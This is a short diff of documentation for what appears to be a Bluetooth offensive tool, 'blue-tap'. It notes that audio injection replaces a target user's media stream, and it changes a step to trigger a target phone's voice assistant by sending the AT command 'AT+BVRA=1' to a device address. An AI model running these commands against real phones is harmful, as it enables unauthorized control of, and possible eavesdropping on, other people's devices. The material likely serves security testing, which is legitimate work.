Skip to content

 Audio injection replaces the current media stream.
 The target user will hear your injected audio instead of their music.
 This is immediately noticeable.

-Step 8: Trigger Voice Assistant
+Step 6: Trigger Voice Assistant via AT Command

-$ sudo blue-tap extract AA:BB:CC:DD:EE:FF audio --action voice-assistant --enable
+$ sudo blue-tap extract AA:BB:CC:DD:EE:FF at -c "AT+BVRA=1"

 [*] Target phone should now show voice assistant UI.